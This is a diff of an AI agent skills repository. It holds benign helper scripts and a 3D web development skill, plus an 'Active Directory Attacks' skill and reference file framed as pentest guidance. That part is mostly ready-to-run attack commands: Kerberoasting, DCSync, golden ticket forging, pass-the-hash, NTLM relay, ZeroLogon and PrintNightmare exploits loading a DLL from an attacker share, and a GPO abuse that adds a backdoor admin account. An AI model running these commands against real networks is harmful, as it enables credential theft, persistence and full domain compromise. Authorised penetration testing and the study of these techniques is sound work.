                    desc_lines.append(line.strip())

                if desc_lines:
                    skill_info["description"] = " ".join(desc_lines)[:150] + "..."

            skills.append(skill_info)

    skills.sort(key=lambda x: x["name"])

    with open(output_file, 'w', encoding='utf-8') as f:
        json.dump(skills, f, indent=2)

    print(f"✅ Generated index with {len(skills)} skills at: {output_file}")
    return skills

if __name__ == "__main__":
    base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    skills_path = os.path.join(base_dir, "skills")
    output_path = os.path.join(base_dir, "skills_index.json")
    generate_index(skills_path, output_path)
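As a quick sanity check of the frontmatter extraction used by `generate_index.py`, the same regexes can be run against a small sample string (the sample content below is illustrative):

```python
import re

sample = """---
name: webapp-testing
description: Toolkit for testing local web applications.
---

# Webapp Testing
"""

# Same patterns as generate_index.py
fm = re.search(r'^---\s*(.*?)\s*---', sample, re.DOTALL).group(1)
name = re.search(r'^name:\s*(.+)$', fm, re.MULTILINE).group(1).strip()
desc = re.search(r'^description:\s*(.+)$', fm, re.MULTILINE).group(1).strip()
print(name)  # webapp-testing
print(desc)  # Toolkit for testing local web applications.
```

Note that the lazy `(.*?)` with `re.DOTALL` stops at the first closing `---`, so code fences later in the file are not mistaken for frontmatter.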
119
scripts/skills_manager.py
Executable file
@@ -0,0 +1,119 @@
#!/usr/bin/env python3
"""
Skills Manager - Easily enable/disable skills locally

Usage:
    python3 scripts/skills_manager.py list           # List active skills
    python3 scripts/skills_manager.py disabled       # List disabled skills
    python3 scripts/skills_manager.py enable SKILL   # Enable a skill
    python3 scripts/skills_manager.py disable SKILL  # Disable a skill
"""

import sys
import os
from pathlib import Path

SKILLS_DIR = Path(__file__).parent.parent / "skills"
DISABLED_DIR = SKILLS_DIR / ".disabled"

def list_active():
    """List all active skills"""
    print("🟢 Active Skills:\n")
    skills = sorted([d.name for d in SKILLS_DIR.iterdir()
                     if d.is_dir() and not d.name.startswith('.')])
    symlinks = sorted([s.name for s in SKILLS_DIR.iterdir()
                       if s.is_symlink()])

    for skill in skills:
        print(f"  • {skill}")

    if symlinks:
        print("\n📎 Symlinks:")
        for link in symlinks:
            target = os.readlink(SKILLS_DIR / link)
            print(f"  • {link} → {target}")

    print(f"\n✅ Total: {len(skills)} skills + {len(symlinks)} symlinks")

def list_disabled():
    """List all disabled skills"""
    if not DISABLED_DIR.exists():
        print("❌ No disabled skills directory found")
        return

    print("⚪ Disabled Skills:\n")
    disabled = sorted([d.name for d in DISABLED_DIR.iterdir() if d.is_dir()])

    for skill in disabled:
        print(f"  • {skill}")

    print(f"\n📊 Total: {len(disabled)} disabled skills")

def enable_skill(skill_name):
    """Enable a disabled skill"""
    source = DISABLED_DIR / skill_name
    target = SKILLS_DIR / skill_name

    if not source.exists():
        print(f"❌ Skill '{skill_name}' not found in .disabled/")
        return False

    if target.exists():
        print(f"⚠️ Skill '{skill_name}' is already active")
        return False

    source.rename(target)
    print(f"✅ Enabled: {skill_name}")
    return True

def disable_skill(skill_name):
    """Disable an active skill"""
    source = SKILLS_DIR / skill_name
    target = DISABLED_DIR / skill_name

    if not source.exists():
        print(f"❌ Skill '{skill_name}' not found")
        return False

    if source.name.startswith('.'):
        print(f"⚠️ Cannot disable system directory: {skill_name}")
        return False

    if source.is_symlink():
        print(f"⚠️ Cannot disable symlink: {skill_name}")
        print("   (Remove the symlink manually if needed)")
        return False

    DISABLED_DIR.mkdir(exist_ok=True)
    source.rename(target)
    print(f"✅ Disabled: {skill_name}")
    return True

def main():
    if len(sys.argv) < 2:
        print(__doc__)
        sys.exit(1)

    command = sys.argv[1].lower()

    if command == "list":
        list_active()
    elif command == "disabled":
        list_disabled()
    elif command == "enable":
        if len(sys.argv) < 3:
            print("❌ Usage: skills_manager.py enable SKILL_NAME")
            sys.exit(1)
        enable_skill(sys.argv[2])
    elif command == "disable":
        if len(sys.argv) < 3:
            print("❌ Usage: skills_manager.py disable SKILL_NAME")
            sys.exit(1)
        disable_skill(sys.argv[2])
    else:
        print(f"❌ Unknown command: {command}")
        print(__doc__)
        sys.exit(1)

if __name__ == "__main__":
    main()
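The enable/disable operations in `skills_manager.py` are plain directory renames between `skills/` and `skills/.disabled/`. A minimal standalone sketch of that mechanism, using a throwaway temporary tree and a hypothetical `demo-skill` directory:

```python
import tempfile
from pathlib import Path

# Build a throwaway skills tree
skills = Path(tempfile.mkdtemp()) / "skills"
disabled = skills / ".disabled"
(skills / "demo-skill").mkdir(parents=True)

# "disable": skills/demo-skill -> skills/.disabled/demo-skill
disabled.mkdir(exist_ok=True)
(skills / "demo-skill").rename(disabled / "demo-skill")
print((disabled / "demo-skill").is_dir())  # True

# "enable": move it back
(disabled / "demo-skill").rename(skills / "demo-skill")
print((skills / "demo-skill").is_dir())    # True
```

Because agents only scan non-hidden directories under `skills/`, moving a skill into the dot-prefixed `.disabled/` folder hides it without deleting anything.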
114
scripts/sync_recommended_skills.sh
Executable file
@@ -0,0 +1,114 @@
#!/bin/bash
# sync_recommended_skills.sh
# Syncs only the recommended skills from the GitHub repo to the local central library

set -e

# Paths
GITHUB_REPO="/Users/nicco/Antigravity Projects/antigravity-awesome-skills/skills"
LOCAL_LIBRARY="/Users/nicco/.gemini/antigravity/scratch/.agent/skills"
BACKUP_DIR="/Users/nicco/.gemini/antigravity/scratch/.agent/skills_backup_$(date +%Y%m%d_%H%M%S)"

# Recommended skills
RECOMMENDED_SKILLS=(
    # Tier S - Core Development (13)
    "systematic-debugging"
    "test-driven-development"
    "writing-skills"
    "doc-coauthoring"
    "planning-with-files"
    "concise-planning"
    "software-architecture"
    "senior-architect"
    "senior-fullstack"
    "verification-before-completion"
    "git-pushing"
    "address-github-comments"
    "javascript-mastery"

    # Tier A - Your Projects (12)
    "docx-official"
    "pdf-official"
    "pptx-official"
    "xlsx-official"
    "react-best-practices"
    "web-design-guidelines"
    "frontend-dev-guidelines"
    "webapp-testing"
    "playwright-skill"
    "mcp-builder"
    "notebooklm"
    "ui-ux-pro-max"

    # Marketing & SEO (1)
    "content-creator"

    # Corporate (4)
    "brand-guidelines-anthropic"
    "brand-guidelines-community"
    "internal-comms-anthropic"
    "internal-comms-community"

    # Planning & Documentation (1)
    "writing-plans"

    # AI & Automation (5)
    "workflow-automation"
    "llm-app-patterns"
    "autonomous-agent-patterns"
    "prompt-library"
    "github-workflow-automation"
)

echo "🔄 Sync Recommended Skills"
echo "========================="
echo ""
echo "📍 Source: $GITHUB_REPO"
echo "📍 Target: $LOCAL_LIBRARY"
echo "📊 Skills to sync: ${#RECOMMENDED_SKILLS[@]}"
echo ""

# Create backup
echo "📦 Creating backup at: $BACKUP_DIR"
cp -r "$LOCAL_LIBRARY" "$BACKUP_DIR"
echo "✅ Backup created"
echo ""

# Clear local library (keeps non-directory files such as README.md)
echo "🗑️ Clearing local library..."
cd "$LOCAL_LIBRARY"
for item in */; do
    rm -rf "$item"
done
echo "✅ Local library cleared"
echo ""

# Copy recommended skills
echo "📋 Copying recommended skills..."
SUCCESS_COUNT=0
MISSING_COUNT=0

for skill in "${RECOMMENDED_SKILLS[@]}"; do
    if [ -d "$GITHUB_REPO/$skill" ]; then
        cp -r "$GITHUB_REPO/$skill" "$LOCAL_LIBRARY/"
        echo "  ✅ $skill"
        SUCCESS_COUNT=$((SUCCESS_COUNT + 1))  # avoid ((i++)): it returns status 1 when i is 0, killing the script under set -e
    else
        echo "  ⚠️ $skill (not found in repo)"
        MISSING_COUNT=$((MISSING_COUNT + 1))
    fi
done

echo ""
echo "📊 Summary"
echo "=========="
echo "✅ Copied: $SUCCESS_COUNT skills"
echo "⚠️ Missing: $MISSING_COUNT skills"
echo "📦 Backup: $BACKUP_DIR"
echo ""

# Verify
FINAL_COUNT=$(find "$LOCAL_LIBRARY" -maxdepth 1 -type d ! -name "." | wc -l | tr -d ' ')
echo "🎯 Final count in local library: $FINAL_COUNT skills"
echo ""
echo "Done! Your local library now has only the recommended skills."
50
scripts/validate_skills.py
Normal file
@@ -0,0 +1,50 @@
import os
import re

def validate_skills(skills_dir):
    print(f"🔍 Validating skills in: {skills_dir}")
    errors = []
    skill_count = 0

    for root, dirs, files in os.walk(skills_dir):
        if "SKILL.md" in files:
            skill_count += 1
            skill_path = os.path.join(root, "SKILL.md")
            rel_path = os.path.relpath(skill_path, skills_dir)

            with open(skill_path, 'r', encoding='utf-8') as f:
                content = f.read()

            # Check for frontmatter or a top-level heading
            has_frontmatter = content.strip().startswith("---")
            has_header = re.search(r'^#\s+', content, re.MULTILINE)

            if not (has_frontmatter or has_header):
                errors.append(f"❌ {rel_path}: Missing frontmatter or top-level heading")

            if has_frontmatter:
                # Basic check for name and description in frontmatter
                fm_match = re.search(r'^---\s*(.*?)\s*---', content, re.DOTALL)
                if fm_match:
                    fm_content = fm_match.group(1)
                    if "name:" not in fm_content:
                        errors.append(f"⚠️ {rel_path}: Frontmatter missing 'name:'")
                    if "description:" not in fm_content:
                        errors.append(f"⚠️ {rel_path}: Frontmatter missing 'description:'")
                else:
                    errors.append(f"❌ {rel_path}: Malformed frontmatter")

    print(f"✅ Found and checked {skill_count} skills.")
    if errors:
        print("\n⚠️ Validation Results:")
        for err in errors:
            print(err)
        return False
    else:
        print("✨ All skills passed basic validation!")
        return True

if __name__ == "__main__":
    base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    skills_path = os.path.join(base_dir, "skills")
    validate_skills(skills_path)
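The structural check at the heart of `validate_skills.py` (frontmatter or a top-level heading) can be exercised in isolation; the two sample strings below are illustrative, not real skill files:

```python
import re

# Hypothetical SKILL.md contents
good = "---\nname: demo\ndescription: A demo skill.\n---\n\n# Demo\n"
bad = "Just prose, with neither frontmatter nor a heading.\n"

def basic_ok(content):
    # Same two checks as validate_skills.py
    has_frontmatter = content.strip().startswith("---")
    has_header = re.search(r'^#\s+', content, re.MULTILINE) is not None
    return has_frontmatter or has_header

print(basic_ok(good))  # True
print(basic_ok(bad))   # False
```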
3
skills/.gitignore
vendored
Normal file
@@ -0,0 +1,3 @@
# Local-only: disabled skills for lean configuration
# These skills are kept in the repository but disabled locally
.disabled/
254
skills/3d-web-experience/SKILL.md
Normal file
@@ -0,0 +1,254 @@
---
name: 3d-web-experience
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing depth to web experiences. Use when: 3D website, three.js, WebGL, react three fiber, 3D experience."
source: vibeship-spawner-skills (Apache 2.0)
---

# 3D Web Experience

**Role**: 3D Web Experience Architect

You bring the third dimension to the web. You know when 3D enhances and when it's just showing off. You balance visual impact with performance. You make 3D accessible to users who've never touched a 3D app. You create moments of wonder without sacrificing usability.

## Capabilities

- Three.js implementation
- React Three Fiber
- WebGL optimization
- 3D model integration
- Spline workflows
- 3D product configurators
- Interactive 3D scenes
- 3D performance optimization

## Patterns

### 3D Stack Selection

Choosing the right 3D approach.

**When to use**: When starting a 3D web project.

#### Options Comparison

| Tool | Best For | Learning Curve | Control |
|------|----------|----------------|---------|
| Spline | Quick prototypes, designers | Low | Medium |
| React Three Fiber | React apps, complex scenes | Medium | High |
| Three.js vanilla | Max control, non-React | High | Maximum |
| Babylon.js | Games, heavy 3D | High | Maximum |

#### Decision Tree

```text
Need quick 3D element?
└── Yes → Spline
└── No → Continue

Using React?
└── Yes → React Three Fiber
└── No → Continue

Need max performance/control?
└── Yes → Three.js vanilla
└── No → Spline or R3F
```

#### Spline (Fastest Start)

```jsx
import Spline from '@splinetool/react-spline';

export default function Scene() {
  return (
    <Spline scene="https://prod.spline.design/xxx/scene.splinecode" />
  );
}
```

#### React Three Fiber

```jsx
import { Canvas } from '@react-three/fiber';
import { OrbitControls, useGLTF } from '@react-three/drei';

function Model() {
  const { scene } = useGLTF('/model.glb');
  return <primitive object={scene} />;
}

export default function Scene() {
  return (
    <Canvas>
      <ambientLight />
      <Model />
      <OrbitControls />
    </Canvas>
  );
}
```

### 3D Model Pipeline

Getting models web-ready.

**When to use**: When preparing 3D assets.

#### Format Selection

| Format | Use Case | Size |
|--------|----------|------|
| GLB/GLTF | Standard web 3D | Smallest |
| FBX | From 3D software | Large |
| OBJ | Simple meshes | Medium |
| USDZ | Apple AR | Medium |

#### Optimization Pipeline

```text
1. Model in Blender/etc.
2. Reduce poly count (< 100K for web)
3. Bake textures (combine materials)
4. Export as GLB
5. Compress with gltf-transform
6. Test file size (< 5MB ideal)
```

#### GLTF Compression

```bash
# Install gltf-transform
npm install -g @gltf-transform/cli

# Compress model
gltf-transform optimize input.glb output.glb \
  --compress draco \
  --texture-compress webp
```

#### Loading in R3F

```jsx
import { useGLTF, useProgress, Html } from '@react-three/drei';
import { Suspense } from 'react';

function Loader() {
  const { progress } = useProgress();
  return <Html center>{progress.toFixed(0)}%</Html>;
}

export default function Scene() {
  return (
    <Canvas>
      <Suspense fallback={<Loader />}>
        <Model />
      </Suspense>
    </Canvas>
  );
}
```

### Scroll-Driven 3D

3D that responds to scroll.

**When to use**: When integrating 3D with scroll.

#### R3F + Scroll Controls

```jsx
import { useRef } from 'react';
import { ScrollControls, useScroll } from '@react-three/drei';
import { useFrame } from '@react-three/fiber';

function RotatingModel() {
  const scroll = useScroll();
  const ref = useRef();

  useFrame(() => {
    // Rotate based on scroll position
    ref.current.rotation.y = scroll.offset * Math.PI * 2;
  });

  return <mesh ref={ref}>...</mesh>;
}

export default function Scene() {
  return (
    <Canvas>
      <ScrollControls pages={3}>
        <RotatingModel />
      </ScrollControls>
    </Canvas>
  );
}
```

#### GSAP + Three.js

```javascript
import gsap from 'gsap';
import ScrollTrigger from 'gsap/ScrollTrigger';

gsap.registerPlugin(ScrollTrigger);

gsap.to(camera.position, {
  scrollTrigger: {
    trigger: '.section',
    scrub: true,
  },
  z: 5,
  y: 2,
});
```

#### Common Scroll Effects

- Camera movement through scene
- Model rotation on scroll
- Reveal/hide elements
- Color/material changes
- Exploded view animations

## Anti-Patterns

### ❌ 3D For 3D's Sake

**Why bad**: Slows down the site. Confuses users. Drains battery on mobile. Doesn't help conversion.

**Instead**: 3D should serve a purpose. Product visualization = good. Random floating shapes = probably not. Ask: would an image work?

### ❌ Desktop-Only 3D

**Why bad**: Most traffic is mobile. Kills battery. Crashes on low-end devices. Frustrates users.

**Instead**: Test on real mobile devices. Reduce quality on mobile. Provide a static fallback. Consider disabling 3D on low-end devices.

### ❌ No Loading State

**Why bad**: Users think it's broken. High bounce rate. 3D takes time to load. Bad first impression.

**Instead**: Show a loading progress indicator. Use a skeleton/placeholder. Load 3D after the page is interactive. Optimize model size.

## Related Skills

Works well with: `scroll-experience`, `interactive-portfolio`, `frontend`, `landing-page-design`
380
skills/active-directory-attacks/SKILL.md
Normal file
@@ -0,0 +1,380 @@
|
||||
---
|
||||
name: Active Directory Attacks
|
||||
description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
|
||||
---
|
||||
|
||||
# Active Directory Attacks
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Kali Linux or Windows attack platform
|
||||
- Domain user credentials (for most attacks)
|
||||
- Network access to Domain Controller
|
||||
- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Domain enumeration data
|
||||
- Extracted credentials and hashes
|
||||
- Kerberos tickets for impersonation
|
||||
- Domain Administrator access
|
||||
- Persistent access mechanisms
|
||||
|
||||
---
|
||||
|
||||
## Essential Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| BloodHound | AD attack path visualization |
|
||||
| Impacket | Python AD attack tools |
|
||||
| Mimikatz | Credential extraction |
|
||||
| Rubeus | Kerberos attacks |
|
||||
| CrackMapExec | Network exploitation |
|
||||
| PowerView | AD enumeration |
|
||||
| Responder | LLMNR/NBT-NS poisoning |
|
||||
|
||||
---
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Step 1: Kerberos Clock Sync
|
||||
|
||||
Kerberos requires clock synchronization (±5 minutes):
|
||||
|
||||
```bash
|
||||
# Detect clock skew
|
||||
nmap -sT 10.10.10.10 -p445 --script smb2-time
|
||||
|
||||
# Fix clock on Linux
|
||||
sudo date -s "14 APR 2024 18:25:16"
|
||||
|
||||
# Fix clock on Windows
|
||||
net time /domain /set
|
||||
|
||||
# Fake clock without changing system time
|
||||
faketime -f '+8h' <command>
|
||||
```
|
||||
|
||||
### Step 2: AD Reconnaissance with BloodHound
|
||||
|
||||
```bash
|
||||
# Start BloodHound
|
||||
neo4j console
|
||||
bloodhound --no-sandbox
|
||||
|
||||
# Collect data with SharpHound
|
||||
.\SharpHound.exe -c All
|
||||
.\SharpHound.exe -c All --ldapusername user --ldappassword pass
|
||||
|
||||
# Python collector (from Linux)
|
||||
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
|
||||
```
|
||||
|
||||
### Step 3: PowerView Enumeration
|
||||
|
||||
```powershell
|
||||
# Get domain info
|
||||
Get-NetDomain
|
||||
Get-DomainSID
|
||||
Get-NetDomainController
|
||||
|
||||
# Enumerate users
|
||||
Get-NetUser
|
||||
Get-NetUser -SamAccountName targetuser
|
||||
Get-UserProperty -Properties pwdlastset
|
||||
|
||||
# Enumerate groups
|
||||
Get-NetGroupMember -GroupName "Domain Admins"
|
||||
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
|
||||
|
||||
# Find local admin access
|
||||
Find-LocalAdminAccess -Verbose
|
||||
|
||||
# User hunting
|
||||
Invoke-UserHunter
|
||||
Invoke-UserHunter -Stealth
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Credential Attacks
|
||||
|
||||
### Password Spraying
|
||||
|
||||
```bash
|
||||
# Using kerbrute
|
||||
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
|
||||
|
||||
# Using CrackMapExec
|
||||
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
|
||||
```
|
||||
|
||||
### Kerberoasting
|
||||
|
||||
Extract service account TGS tickets and crack offline:
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe kerberoast /outfile:hashes.txt
|
||||
|
||||
# CrackMapExec
|
||||
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
|
||||
|
||||
# Crack with hashcat
|
||||
hashcat -m 13100 hashes.txt rockyou.txt
|
||||
```
|
||||
|
||||
### AS-REP Roasting
|
||||
|
||||
Target accounts with "Do not require Kerberos preauthentication":
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
|
||||
|
||||
# Crack with hashcat
|
||||
hashcat -m 18200 hashes.txt rockyou.txt
|
||||
```
|
||||
|
||||
### DCSync Attack
|
||||
|
||||
Extract credentials directly from DC (requires Replicating Directory Changes rights):
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
|
||||
|
||||
# Mimikatz
|
||||
lsadump::dcsync /domain:domain.local /user:krbtgt
|
||||
lsadump::dcsync /domain:domain.local /user:Administrator
|
||||
```

---

## Kerberos Ticket Attacks

### Pass-the-Ticket (Golden Ticket)

Forge TGT with krbtgt hash for any user:

```powershell
# Get krbtgt hash via DCSync first
# Mimikatz - Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
```

```bash
# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
```

### Silver Ticket

Forge TGS for a specific service:

```powershell
# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
```
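
The same forgery works from Linux with Impacket's `ticketer.py`; a sketch where hash and SID values are placeholders (the `-spn` flag is what switches it from a golden to a silver ticket):

```bash
# Forge a silver ticket for CIFS on one host (uses the service account NT hash, not krbtgt)
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-xxx -domain domain.local \
    -spn cifs/server.domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@server.domain.local
```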

### Pass-the-Hash

```bash
# Impacket
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH

# CrackMapExec
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
```

### OverPass-the-Hash

Convert NTLM hash to Kerberos ticket:

```bash
# Impacket
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache
```

```powershell
# Rubeus
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
```

---

## NTLM Relay Attacks

### Responder + ntlmrelayx

```bash
# Start Responder (first set SMB = Off and HTTP = Off in Responder.conf so hashes are relayed, not captured)
responder -I eth0 -wrf

# Start relay
ntlmrelayx.py -tf targets.txt -smb2support

# LDAP relay for delegation attack
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
```

### SMB Signing Check

```bash
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
```

---

## Certificate Services Attacks (AD CS)

### ESC1 - Misconfigured Templates

```bash
# Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10

# Exploit ESC1
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local

# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
```

### ESC8 - Web Enrollment Relay

```bash
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```

---

## Critical CVEs

### ZeroLogon (CVE-2020-1472)

```bash
# Check vulnerability
crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon

# Exploit
python3 cve-2020-1472-exploit.py DC01 10.10.10.10

# Extract hashes
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass

# Restore password (important!)
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
```

### PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

```bash
# Check for vulnerability
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'

# Exploit (requires hosting malicious DLL)
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
```

### samAccountName Spoofing (CVE-2021-42278/42287)

```bash
# Automated exploitation
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
```

---

## Quick Reference

| Attack | Tool | Command |
|--------|------|---------|
| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |

---

## Constraints

**Must:**
- Synchronize time with DC before Kerberos attacks
- Have valid domain credentials for most attacks
- Document all compromised accounts

**Must Not:**
- Lock out accounts with excessive password spraying
- Modify production AD objects without approval
- Leave Golden Tickets without documentation

**Should:**
- Run BloodHound for attack path discovery
- Check for SMB signing before relay attacks
- Verify patch levels for CVE exploitation
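
The time-sync requirement can be met with a one-liner; a minimal sketch, assuming the DC answers NTP (the IP is a placeholder):

```bash
# Query the DC's clock and report the offset without changing anything
ntpdate -q 10.10.10.10

# Set the local clock from the DC (requires root); fixes KRB_AP_ERR_SKEW errors
sudo ntpdate -u 10.10.10.10
```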

---

## Examples

### Example 1: Domain Compromise via Kerberoasting

```bash
# 1. Find service accounts with SPNs
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10

# 2. Request TGS tickets
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt

# 3. Crack tickets
hashcat -m 13100 tgs.txt rockyou.txt

# 4. Use cracked service account
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
```

### Example 2: NTLM Relay to LDAP

```bash
# 1. Start relay targeting LDAP
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access

# 2. Trigger authentication (e.g., via PrinterBug)
python3 printerbug.py domain.local/user:pass@target 10.10.10.12

# 3. Use created machine account for RBCD attack
```
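
The final step can be sketched with Impacket. The tool names are real, but the account name, password, and hosts are placeholders, and this assumes `--delegate-access` created a machine account whose credentials ntlmrelayx printed:

```bash
# The relayed machine account now has delegation rights to the target;
# request a service ticket impersonating a domain admin
getST.py -spn cifs/target.domain.local -impersonate Administrator \
    'domain.local/ATTACKERPC$:MachinePassword'

# Use the ticket (adjust KRB5CCNAME to the .ccache filename getST.py reports)
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@target.domain.local
```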

---

## Troubleshooting

| Issue | Solution |
|-------|----------|
| Clock skew too great | Sync time with DC or use faketime |
| Kerberoasting returns empty | No service accounts with SPNs |
| DCSync access denied | Need Replicating Directory Changes rights |
| NTLM relay fails | Check SMB signing, try LDAP target |
| BloodHound empty | Verify collector ran with correct creds |

---

## Additional Resources

For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).

---

**New file:** `skills/active-directory-attacks/references/advanced-attacks.md` (382 lines)

# Advanced Active Directory Attacks Reference

## Table of Contents
1. [Delegation Attacks](#delegation-attacks)
2. [Group Policy Object Abuse](#group-policy-object-abuse)
3. [RODC Attacks](#rodc-attacks)
4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
6. [Trust Relationship Attacks](#trust-relationship-attacks)
7. [ADFS Golden SAML](#adfs-golden-saml)
8. [Credential Sources](#credential-sources)
9. [Linux AD Integration](#linux-ad-integration)

---

## Delegation Attacks

### Unconstrained Delegation

When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.

**Find Delegation:**
```powershell
# PowerShell
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

# BloodHound
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
```

**SpoolService Abuse:**
```bash
# Check spooler service
ls \\dc01\pipe\spoolss

# Trigger with SpoolSample
.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local

# Or with printerbug.py
python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
```

**Monitor with Rubeus:**
```powershell
Rubeus.exe monitor /interval:1
```

### Constrained Delegation

**Identify:**
```powershell
Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
```

**Exploit with Rubeus:**
```powershell
# S4U2self + S4U2proxy attack
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
```

**Exploit with Impacket:**
```bash
getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
```

### Resource-Based Constrained Delegation (RBCD)

```powershell
# Create machine account
New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)

# Set delegation
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$

# Get ticket
.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
```

---

## Group Policy Object Abuse

### Find Vulnerable GPOs

```powershell
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
```

### Abuse with SharpGPOAbuse

```powershell
# Add local admin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"

# Add user rights
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"

# Add immediate task
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
```

### Abuse with pyGPOAbuse (Linux)

```bash
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
```

---

## RODC Attacks

### RODC Golden Ticket

RODCs hold a filtered copy of AD (LAPS and BitLocker keys are excluded). Tickets forged with the RODC krbtgt key are only honored for principals listed in msDS-RevealOnDemandGroup.

### RODC Key List Attack

**Requirements:**
- krbtgt credentials of the RODC (-rodcKey)
